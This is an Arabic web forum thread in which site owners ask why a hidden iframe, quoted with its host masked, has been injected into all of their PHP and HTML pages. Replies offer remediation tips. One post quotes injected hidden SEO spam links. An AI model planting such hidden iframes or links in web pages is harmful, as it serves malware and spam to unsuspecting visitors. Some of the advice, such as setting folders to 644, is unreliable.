النتائج 1 إلى 5 من 5

الموضوع: سالفه <iframe

  1. #1
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2008
    المشاركات
    331

    سالفه <iframe



    السلام عليكم

    الاخوه الكرام
    مشكله في انتشار <iframe في ملفات html و php وهي عباره عن رابط مخفي يقوم بتنزيل ملف باك دور عند زيارتك اي صفحه الكترونيه يكون موضوع بها

    المشكله ان كل الصفحات سواء php او html يتم تواجد هذا الكود فيهم ...
    السؤال ماذا يستغل هذا الكود لكي يزرع نفسه بشكل تلقائي بالصفحات
    والسؤال الثاني ما الحل ؟؟


    مشكورين


    للعلم هذا الفريم
    <iframe src="http://*******/in/" width=1 height=1 style="visibility: hidden"></iframe>





    __________________
    لا يوجد توقيع مناسب حاليا


  2. #2
    عضو فعال
    تاريخ التسجيل
    May 2006
    المشاركات
    1,066


    فيرس في جهازك بيتنقل عن طريق الاف تي بي لمفات موقعك

    في منه نوعين
    االاول بيتنقل لأي ملف اسمه index بكل امتدادته فقط
    التاني بيتنقل في كل ملفات الموقع

    اعمل نسخة جديدة عندك وسطب الكاسبر انترنت سيكورتي 9 واعمل سكان علي جهازك وبعدين افتح الملفات عندك الي فيها الكود وامسحه
    وان شاء الله خير





    __________________
    No Sig

  3. #3
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2008
    المشاركات
    331


    فيرس في جهازك بيتنقل عن طريق الاف تي بي لمفات موقعك

    في منه نوعين
    االاول بيتنقل لأي ملف اسمه index بكل امتدادته فقط
    التاني بيتنقل في كل ملفات الموقع

    اعمل نسخة جديدة عندك وسطب الكاسبر انترنت سيكورتي 9 واعمل سكان علي جهازك وبعدين افتح الملفات عندك الي فيها الكود وامسحه
    وان شاء الله خير
    عزيزي لا المشكله مو كذا الملفات على الكمبيوتر الخاص نظيفه 100%
    وما في اي اثر لهذا الكود ...

    كيف جميع ملفات الموقع انحقنت بهذا الكود لا ادري ولكن لربما هنالك ثغره سمحت لهذه الدوده بالتغلغل الى ملفات الموقع ليس الا ولوحدها
    انا اذكر قبل فتره قرأت عن هذا الموضوع في سوالف عن كود يصيب صفحات html

    الرجاء من الذين اصابهم هذا الكود افادتنا في حله جذريا





    __________________
    لا يوجد توقيع مناسب حاليا

  4. #4
    عضو فعال
    تاريخ التسجيل
    Jul 2008
    المشاركات
    1,516


    اذا الفايروس أصبح في موفعك - فتش عنه جيداً بين الملفات ... لا يكفي فقط تعديل الملفات - بل يجب عليك محو الملف الخاص الذي يزرع الكود فيه...
    راجع اللوغ - ورح تعرف المصدر.

    غير الصلاحيات للمجلدات : لنقل ل 644

    غير صلاحيات بعض الملفات المهمة ايضاً لدرجة آمنة.

    يمكنك ايضاً استعمال JavaScript لمحو كل Iframe مع display = none - تضع هذا الكود في آخر الصفحة ويكون مسؤول عن ازالتها على الأقل بطرف الزائر...
    مع أن هذا الأمر لن يعفيك من غوغل الذي سيعلن أن موقعك مصاب بفايروس ، وسيمنع الزوار من الدخول عن طريقه اليك.





    __________________
    أحب سوالف ولا احب الجدليين!
    اسماء اولاد وبنات http://muslim-names.us
    1000 مزاد http://1000mazad.com
    موقع نكت سعوديةhttp://arab-jokes.net

  5. #5
    عضو سوبر نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    700


    والله انا اعاني من المشكلة وبقوووووة
    والحين اي واحد يفتح موقعي بجوجل يعطيه تحذير

    المزرع عندي
    </script>
    <a href="http://www.zamansiz.com/"></a><a href="http://www.otoder.com/"></a><a href="http://www.findomestic.org/"></a><a href="http://www.findomesticbanca.org/"></a><a href="http://www.bankaustria.org/"></a></body>
    </html>

    رفعت نسخة جديدة من المنتدى وغيرت الاستايلات
    ومارضى يمسح ماادري وش سالفة هالكود










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض